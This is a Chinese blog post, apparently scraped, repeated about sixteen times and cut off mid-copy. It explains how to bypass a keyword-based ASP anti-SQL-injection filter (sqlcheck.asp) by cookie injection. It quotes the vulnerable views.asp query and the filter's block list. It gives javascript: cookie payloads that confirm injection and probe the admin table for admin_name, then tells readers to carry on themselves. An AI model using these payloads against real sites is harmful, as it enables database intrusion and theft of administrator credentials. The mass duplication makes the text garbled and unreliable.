If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44575) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44574) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44573) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44572) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44571) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44570) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44569) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44568) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44567) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44566) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44565) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44564) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44563) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44562) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44561) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
